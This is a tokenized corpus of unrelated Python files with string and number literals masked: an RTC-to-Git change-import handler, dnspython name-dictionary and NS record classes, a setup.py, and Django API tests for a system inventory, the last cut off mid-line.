<EOL> changeEntry . setUnaccepted ( ) <EOL> @ staticmethod <EOL> def accept ( logpath , * changeentries ) : <EOL> for changeEntry in changeentries : <EOL> shouter . shout ( "<STR_LIT>" + changeEntry . tostring ( ) ) <EOL> revisions = Changes . _collectids ( changeentries ) <EOL> config = configuration . get ( ) <EOL> Changes . latest_accept_command = config . scmcommand + "<STR_LIT>" + config . repo + "<STR_LIT>" + config . workspace + "<STR_LIT>" + revisions <EOL> exitcode = shell . execute ( Changes . latest_accept_command , logpath , "<STR_LIT:a>" ) <EOL> if exitcode is <NUM_LIT:0> : <EOL> for changeEntry in changeentries : <EOL> changeEntry . setAccepted ( ) <EOL> return True <EOL> else : <EOL> return False <EOL> @ staticmethod <EOL> def _collectids ( changeentries ) : <EOL> ids = "<STR_LIT>" <EOL> for changeentry in changeentries : <EOL> ids += "<STR_LIT:U+0020>" + changeentry . revision <EOL> return ids <EOL> @ staticmethod <EOL> def tostring ( * changes ) : <EOL> logmessage = "<STR_LIT>" <EOL> for change in changes : <EOL> logmessage += change . tostring ( ) + "<STR_LIT:\n>" <EOL> shouter . shout ( logmessage ) <EOL> class ImportHandler : <EOL> def __init__ ( self ) : <EOL> self . config = configuration . get ( ) <EOL> self . acceptlogpath = self . config . getlogpath ( "<STR_LIT>" ) <EOL> def getcomponentbaselineentriesfromstream ( self , stream ) : <EOL> filename = self . config . getlogpath ( "<STR_LIT>" + stream + "<STR_LIT>" ) <EOL> command = "<STR_LIT>" % ( self . config . scmcommand , <EOL> self . config . repo , stream ) <EOL> shell . execute ( command , filename ) <EOL> componentbaselinesentries = [ ] <EOL> skippedfirstrow = False <EOL> islinewithcomponent = <NUM_LIT:2> <EOL> component = "<STR_LIT>" <EOL> baseline = "<STR_LIT>" <EOL> componentname = "<STR_LIT>" <EOL> baselinename = "<STR_LIT>" <EOL> with open ( filename , '<STR_LIT:r>' , encoding = shell . encoding ) as file : <EOL> for line in file : <EOL> cleanedline = line . strip ( ) <EOL> if cleanedline : <EOL> if not skippedfirstrow : <EOL> skippedfirstrow = True <EOL> continue <EOL> splittedinformationline = line . split ( "<STR_LIT>" ) <EOL> uuidpart = splittedinformationline [ <NUM_LIT:0> ] . split ( "<STR_LIT:U+0020>" ) <EOL> if islinewithcomponent % <NUM_LIT:2> is <NUM_LIT:0> : <EOL> component = uuidpart [ <NUM_LIT:3> ] . strip ( ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> componentname = splittedinformationline [ <NUM_LIT:1> ] <EOL> else : <EOL> baseline = uuidpart [ <NUM_LIT:5> ] . strip ( ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> baselinename = splittedinformationline [ <NUM_LIT:1> ] <EOL> if baseline and component : <EOL> componentbaselinesentries . append ( <EOL> ComponentBaseLineEntry ( component , baseline , componentname , baselinename ) ) <EOL> baseline = "<STR_LIT>" <EOL> component = "<STR_LIT>" <EOL> componentname = "<STR_LIT>" <EOL> baselinename = "<STR_LIT>" <EOL> islinewithcomponent += <NUM_LIT:1> <EOL> return componentbaselinesentries <EOL> def determineinitialbaseline ( self , stream ) : <EOL> regex = "<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> config = self . config <EOL> componentbaselinesentries = self . getcomponentbaselineentriesfromstream ( stream ) <EOL> for entry in componentbaselinesentries : <EOL> shouter . shout ( "<STR_LIT>" + entry . componentname ) <EOL> command = "<STR_LIT>" % ( entry . component , config . repo , config . user , config . password ) <EOL> baselineslines = shell . getoutput ( command ) <EOL> baselineslines . reverse ( ) <EOL> for baselineline in baselineslines : <EOL> matcher = pattern . search ( baselineline ) <EOL> if matcher : <EOL> matchedstring = matcher . group ( ) <EOL> uuid = matchedstring [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> entry . baseline = uuid <EOL> entry . baselinename = "<STR_LIT>" <EOL> shouter . shout ( "<STR_LIT>" % baselineline ) <EOL> break <EOL> return componentbaselinesentries <EOL> def acceptchangesintoworkspace ( self , changeentries ) : <EOL> amountofchanges = len ( changeentries ) <EOL> shouter . shoutwithdate ( "<STR_LIT>" % amountofchanges ) <EOL> amountofacceptedchanges = <NUM_LIT:0> <EOL> for changeEntry in changeentries : <EOL> amountofacceptedchanges += <NUM_LIT:1> <EOL> if not changeEntry . isAccepted ( ) : <EOL> if not Changes . accept ( self . acceptlogpath , changeEntry ) : <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> if not Differ . has_diff ( ) : <EOL> WorkspaceHandler ( ) . load ( ) <EOL> shouter . shout ( "<STR_LIT>" % ( amountofacceptedchanges , amountofchanges ) ) <EOL> Commiter . addandcommit ( changeEntry ) <EOL> return amountofacceptedchanges <EOL> @ staticmethod <EOL> def collect_changes_to_accept_to_avoid_conflicts ( changewhichcantbeacceptedalone , changes , maxchangesetstoaccepttogether ) : <EOL> changestoaccept = [ changewhichcantbeacceptedalone ] <EOL> nextchange = ImportHandler . getnextchangeset_fromsamecomponent ( changewhichcantbeacceptedalone , changes ) <EOL> while True : <EOL> if nextchange and len ( changestoaccept ) < maxchangesetstoaccepttogether : <EOL> changestoaccept . append ( nextchange ) <EOL> nextchange = ImportHandler . getnextchangeset_fromsamecomponent ( nextchange , changes ) <EOL> else : <EOL> break <EOL> return changestoaccept <EOL> def retryacceptincludingnextchangesets ( self , change , changes ) : <EOL> issuccessful = False <EOL> changestoaccept = ImportHandler . collect_changes_to_accept_to_avoid_conflicts ( change , changes , self . config . maxchangesetstoaccepttogether ) <EOL> amountofchangestoaccept = len ( changestoaccept ) <EOL> if amountofchangestoaccept > <NUM_LIT:1> : <EOL> Changes . tostring ( * changestoaccept ) <EOL> if self . config . useautomaticconflictresolution or self . is_user_agreeing_to_accept_next_change ( change ) : <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> for index in range ( <NUM_LIT:1> , amountofchangestoaccept ) : <EOL> toaccept = changestoaccept [ <NUM_LIT:0> : index + <NUM_LIT:1> ] <EOL> if Changes . accept ( self . acceptlogpath , * toaccept ) : <EOL> issuccessful = True <EOL> break <EOL> if not issuccessful : <EOL> self . is_user_aborting ( change ) <EOL> @ staticmethod <EOL> def is_user_agreeing_to_accept_next_change ( change ) : <EOL> messagetoask = "<STR_LIT>" <EOL> while True : <EOL> answer = input ( messagetoask ) . lower ( ) <EOL> if answer == "<STR_LIT:y>" : <EOL> return True <EOL> elif answer == "<STR_LIT:n>" : <EOL> return not ImportHandler . is_user_aborting ( change ) <EOL> else : <EOL> shouter . shout ( "<STR_LIT>" + answer ) <EOL> @ staticmethod <EOL> def is_user_aborting ( change ) : <EOL> shouter . shout ( "<STR_LIT>" + Changes . latest_accept_command ) <EOL> shouter . shout ( "<STR_LIT>" + Commiter . getcommitcommand ( change ) ) <EOL> reallycontinue = "<STR_LIT>" <EOL> if input ( reallycontinue ) . lower ( ) == "<STR_LIT:y>" : <EOL> return True <EOL> else : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> @ staticmethod <EOL> def getnextchangeset_fromsamecomponent ( currentchangeentry , changeentries ) : <EOL> nextchangeentry = None <EOL> component = currentchangeentry . component <EOL> nextindex = changeentries . index ( currentchangeentry ) + <NUM_LIT:1> <EOL> while not nextchangeentry and nextindex < len ( changeentries ) : <EOL> candidateentry = changeentries [ nextindex ] <EOL> if not candidateentry . isAccepted ( ) and candidateentry . component == component : <EOL> nextchangeentry = candidateentry <EOL> nextindex += <NUM_LIT:1> <EOL> return nextchangeentry <EOL> def getchangeentriesofstreamcomponents ( self , componentbaselineentries ) : <EOL> missingchangeentries = { } <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> for componentBaseLineEntry in componentbaselineentries : <EOL> shouter . shout ( "<STR_LIT>" % <EOL> ( componentBaseLineEntry . baselinename , componentBaseLineEntry . componentname ) ) <EOL> changeentries = self . getchangeentriesofbaseline ( componentBaseLineEntry . baseline ) <EOL> for changeentry in changeentries : <EOL> missingchangeentries [ changeentry . revision ] = changeentry <EOL> return missingchangeentries <EOL> def readhistory ( self , componentbaselineentries , streamname ) : <EOL> if not self . config . useprovidedhistory : <EOL> warning = "<STR_LIT>" "<STR_LIT>" <EOL> shouter . shout ( warning ) <EOL> return None <EOL> historyuuids = { } <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> for componentBaseLineEntry in componentbaselineentries : <EOL> history = self . gethistory ( componentBaseLineEntry . componentname , streamname ) <EOL> historyuuids [ componentBaseLineEntry . component ] = history <EOL> return historyuuids <EOL> @ staticmethod <EOL> def getchangeentriestoaccept ( missingchangeentries , history ) : <EOL> changeentriestoaccept = [ ] <EOL> if history : <EOL> historywithchangeentryobject = { } <EOL> for key in history . keys ( ) : <EOL> currentuuids = history . get ( key ) <EOL> changeentries = [ ] <EOL> for uuid in currentuuids : <EOL> changeentry = missingchangeentries . get ( uuid ) <EOL> if changeentry : <EOL> changeentries . append ( changeentry ) <EOL> historywithchangeentryobject [ key ] = changeentries <EOL> changeentriestoaccept = sorter . tosortedlist ( historywithchangeentryobject ) <EOL> else : <EOL> changeentriestoaccept . extend ( missingchangeentries . values ( ) ) <EOL> changeentriestoaccept . sort ( key = lambda change : change . date ) <EOL> return changeentriestoaccept <EOL> @ staticmethod <EOL> def getchangeentriesfromfile ( outputfilename ) : <EOL> informationseparator = "<STR_LIT>" <EOL> numberofexpectedinformationseparators = <NUM_LIT:5> <EOL> changeentries = [ ] <EOL> component = "<STR_LIT>" <EOL> componentprefix = "<STR_LIT>" <EOL> with open ( outputfilename , '<STR_LIT:r>' , encoding = shell . encoding ) as file : <EOL> currentline = "<STR_LIT>" <EOL> currentinformationpresent = <NUM_LIT:0> <EOL> for line in file : <EOL> cleanedline = line . strip ( ) <EOL> if cleanedline : <EOL> if cleanedline . startswith ( componentprefix ) : <EOL> length = len ( componentprefix ) <EOL> component = cleanedline [ length : cleanedline . index ( "<STR_LIT:)>" , length ) ] <EOL> else : <EOL> currentinformationpresent += cleanedline . count ( informationseparator ) <EOL> if currentline : <EOL> currentline += os . linesep <EOL> currentline += cleanedline <EOL> if currentinformationpresent >= numberofexpectedinformationseparators : <EOL> splittedlines = currentline . split ( informationseparator ) <EOL> revisionwithbrackets = splittedlines [ <NUM_LIT:0> ] . strip ( ) <EOL> revision = revisionwithbrackets [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> author = splittedlines [ <NUM_LIT:1> ] . strip ( ) <EOL> email = splittedlines [ <NUM_LIT:2> ] . strip ( ) <EOL> comment = splittedlines [ <NUM_LIT:3> ] . strip ( ) <EOL> date = splittedlines [ <NUM_LIT:4> ] . strip ( ) <EOL> changeentries . append ( ChangeEntry ( revision , author , email , date , comment , component ) ) <EOL> currentinformationpresent = <NUM_LIT:0> <EOL> currentline = "<STR_LIT>" <EOL> return changeentries <EOL> @ staticmethod <EOL> def getsimplehistoryfromfile ( outputfilename ) : <EOL> revisions = [ ] <EOL> if not os . path . isfile ( outputfilename ) : <EOL> shouter . shout ( "<STR_LIT>" + outputfilename ) <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> return revisions <EOL> with open ( outputfilename , '<STR_LIT:r>' , encoding = shell . encoding ) as file : <EOL> for line in file : <EOL> revisions . append ( line . strip ( ) ) <EOL> revisions . reverse ( ) <EOL> return revisions <EOL> def getchangeentriesofbaseline ( self , baselinetocompare ) : <EOL> return self . getchangeentriesbytypeandvalue ( CompareType . baseline , baselinetocompare ) <EOL> def getchangeentriesofstream ( self , streamtocompare ) : <EOL> shouter . shout ( "<STR_LIT>" ) <EOL> missingchangeentries = { } <EOL> changeentries = self . getchangeentriesbytypeandvalue ( CompareType . stream , streamtocompare ) <EOL> for changeentry in changeentries : <EOL> missingchangeentries [ changeentry . revision ] = changeentry <EOL> return missingchangeentries <EOL> def getchangeentriesbytypeandvalue ( self , comparetype , value ) : <EOL> dateformat = "<STR_LIT>" <EOL> outputfilename = self . config . getlogpath ( "<STR_LIT>" + comparetype . name + "<STR_LIT:_>" + value + "<STR_LIT>" ) <EOL> comparecommand = "<STR_LIT>" % ( self . config . scmcommand , self . config . workspace , comparetype . name , value , self . config . repo , <EOL> dateformat ) <EOL> shell . execute ( comparecommand , outputfilename ) <EOL> return ImportHandler . getchangeentriesfromfile ( outputfilename ) <EOL> def gethistory ( self , componentname , streamname ) : <EOL> outputfilename = self . config . gethistorypath ( "<STR_LIT>" % ( componentname , streamname ) ) <EOL> return ImportHandler . getsimplehistoryfromfile ( outputfilename ) <EOL> class ChangeEntry : <EOL> def __init__ ( self , revision , author , email , date , comment , component = "<STR_LIT>" ) : <EOL> self . revision = revision <EOL> self . author = author <EOL> self . email = email <EOL> self . date = date <EOL> self . comment = comment <EOL> self . component = component <EOL> self . setUnaccepted ( ) <EOL> def getgitauthor ( self ) : <EOL> authorrepresentation = "<STR_LIT>" % ( self . author , self . email ) <EOL> return shell . quote ( authorrepresentation ) <EOL> def setAccepted ( self ) : <EOL> self . accepted = True <EOL> def setUnaccepted ( self ) : <EOL> self . accepted = False <EOL> def isAccepted ( self ) : <EOL> return self . accepted <EOL> def tostring ( self ) : <EOL> return "<STR_LIT>" % ( self . comment , self . date , self . author , self . revision , self . component , self . accepted ) <EOL> @ unique <EOL> class CompareType ( Enum ) : <EOL> baseline = <NUM_LIT:1> <EOL> stream = <NUM_LIT:2> </s>
<s> """<STR_LIT>""" <EOL> import dns . name <EOL> import collections <EOL> class NameDict ( collections . MutableMapping ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . __store = dict ( ) <EOL> self . max_depth = <NUM_LIT:0> <EOL> self . max_depth_items = <NUM_LIT:0> <EOL> self . update ( dict ( * args , ** kwargs ) ) <EOL> def __update_max_depth ( self , key ) : <EOL> if len ( key ) == self . max_depth : <EOL> self . max_depth_items = self . max_depth_items + <NUM_LIT:1> <EOL> elif len ( key ) > self . max_depth : <EOL> self . max_depth = len ( key ) <EOL> self . max_depth_items = <NUM_LIT:1> <EOL> def __getitem__ ( self , key ) : <EOL> return self . __store [ key ] <EOL> def __setitem__ ( self , key , value ) : <EOL> if not isinstance ( key , dns . name . Name ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . __store [ key ] = value <EOL> self . __update_max_depth ( key ) <EOL> def __delitem__ ( self , key ) : <EOL> value = self . __store . pop ( key ) <EOL> if len ( value ) == self . max_depth : <EOL> self . max_depth_items = self . max_depth_items - <NUM_LIT:1> <EOL> if self . max_depth_items == <NUM_LIT:0> : <EOL> self . max_depth = <NUM_LIT:0> <EOL> for k in self . __store : <EOL> self . __update_max_depth ( k ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . __store ) <EOL> def __len__ ( self ) : <EOL> return len ( self . __store ) <EOL> def has_key ( self , key ) : <EOL> return self . __store . has_key ( key ) <EOL> def get_deepest_match ( self , name ) : <EOL> """<STR_LIT>""" <EOL> depth = len ( name ) <EOL> if depth > self . max_depth : <EOL> depth = self . max_depth <EOL> for i in xrange ( - depth , <NUM_LIT:0> ) : <EOL> n = dns . name . Name ( name [ i : ] ) <EOL> if self . has_key ( n ) : <EOL> return ( n , self [ n ] ) <EOL> v = self [ dns . name . empty ] <EOL> return ( dns . name . empty , v ) </s>
<s> import dns . rdtypes . nsbase <EOL> class NS ( dns . rdtypes . nsbase . NSBase ) : <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ <EOL> '<STR_LIT:A>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> import sys <EOL> from distutils . core import setup <EOL> version = '<STR_LIT>' <EOL> kwargs = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : version , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : """<STR_LIT>""" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( version , version ) , <EOL> '<STR_LIT>' : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> } <EOL> if sys . hexversion >= <NUM_LIT> : <EOL> kwargs [ '<STR_LIT>' ] = [ ] <EOL> kwargs [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> setup ( ** kwargs ) </s>
<s> from django . test import TestCase <EOL> from django . test . client import Client <EOL> try : <EOL> import json <EOL> except : <EOL> from django . utils import simplejson as json <EOL> from MacroExpansion import MacroExpansion <EOL> from KeyValueTree import KeyValueTree <EOL> from truth . models import Truth , KeyValue as TruthKeyValue <EOL> class TestMacroExpansion ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def test_import ( self ) : <EOL> try : <EOL> from MacroExpansion import MacroExpansion <EOL> except : <EOL> raise ( BaseException ( '<STR_LIT>' ) ) <EOL> try : <EOL> from KeyValueTree import KeyValueTree <EOL> except : <EOL> raise ( BaseException ( '<STR_LIT>' ) ) <EOL> def test_key_value_not_found ( self ) : <EOL> m = MacroExpansion ( '<STR_LIT>' ) <EOL> self . assertEqual ( m . output ( ) , '<STR_LIT>' ) <EOL> def test_key_value_found ( self ) : <EOL> m = MacroExpansion ( '<STR_LIT>' ) <EOL> self . assertEqual ( m . output ( ) , '<STR_LIT>' ) <EOL> class SystemApi ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> new_hostname = '<STR_LIT>' <EOL> new_host_id = <NUM_LIT:3> <EOL> def setup ( self ) : <EOL> self . client = Client ( ) <EOL> def test_get_system_not_found_by_id ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_get_system_by_id ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> def test_get_system_by_hostname ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> def test_create_system ( self ) : <EOL> self . client . delete ( '<STR_LIT>' % self . new_hostname ) <EOL> resp = self . client . post ( '<STR_LIT>' % self . new_hostname ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> obj = json . loads ( resp . content . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] ) <EOL> resp = self . client . get ( '<STR_LIT>' % obj [ '<STR_LIT:id>' ] , follow = True ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> resp = self . client . get ( '<STR_LIT>' % self . new_hostname , follow = True ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , self . new_hostname ) <EOL> def test_update_system ( self ) : <EOL> self . client . delete ( '<STR_LIT>' % self . new_hostname ) <EOL> resp = self . client . post ( '<STR_LIT>' % self . new_hostname ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> obj = json . loads ( resp . content . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] ) <EOL> resp = self . client . put ( '<STR_LIT>' % ( obj [ '<STR_LIT:id>' ] ) , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> resp = self . client . get ( '<STR_LIT>' % ( obj [ '<STR_LIT:id>' ] ) , follow = True ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_delete_system ( self ) : <EOL> self . client . delete ( '<STR_LIT>' % self . new_hostname ) <EOL> resp = self . client . post ( '<STR_LIT>' % self . new_hostname ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> obj = json . loads ( resp . content . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] ) <EOL> resp = self . client . delete ( '<STR_LIT>' % ( obj [ '<STR_LIT:id>' ] ) ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> obj = json . loads ( resp . content . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] ) <EOL> resp = self . client . get ( '<STR_LIT>' % ( obj [ '<STR_LIT:id>' ] ) , follow = True ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> resp = self . client . get ( '<STR_LIT>' % self . new_hostname , follow = True ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_key_value_tree ( self ) : <EOL> tree = KeyValueTree ( '<STR_LIT>' ) . final <EOL> self . assertEqual ( tree [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_key_value_api ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:1>' } ) <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_asset_tag ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_serial ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_serial_and_asset_tag_not_found ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_search_by_system_rack ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:1>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_system_rack_and_rack_order ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_system_rack_and_rack_order_not_found ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_search_by_system_rack_and_serial ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_system_switch_ports ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_system_switch_ports_not_found ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_search_by_system_rack_and_serial_not_found ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> class DHCPApi ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setup ( self ) : <EOL> self . client = Client ( ) <EOL> def test_get_single_scope ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> scope_list = json . loads ( resp . content ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT:True>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_get_second_scope ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> scope_list = json . loads ( resp . content ) <EOL> """<STR_LIT>""" <EOL> def test_get_multiple_scopes ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> scope_list = json . loads ( resp . content ) <EOL> """<STR_LIT>""" <EOL> def test_get_system_by_scope ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> system_list = json . loads ( resp . content ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_get_adapters_by_system ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> system_list = json . loads ( resp . content ) <EOL> def test_delete_network_adapter ( self ) : <EOL> resp = self . client . delete ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> class TestReverseDNSApi ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setup ( self ) : <EOL> self . client = Client ( ) <EOL> def test_get_single_reverse_zone_names_with_descriptions ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> scope_list = json . loads ( resp . content ) <EOL> self . assertEqual ( len ( scope_list ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT:description>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:1> ] [ '<STR_LIT:name>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:1> ] [ '<STR_LIT:description>' ] , '<STR_LIT>' ) <EOL> def test_get_system_by_reverse_dns_zone ( self ) : <EOL> resp = self . client . 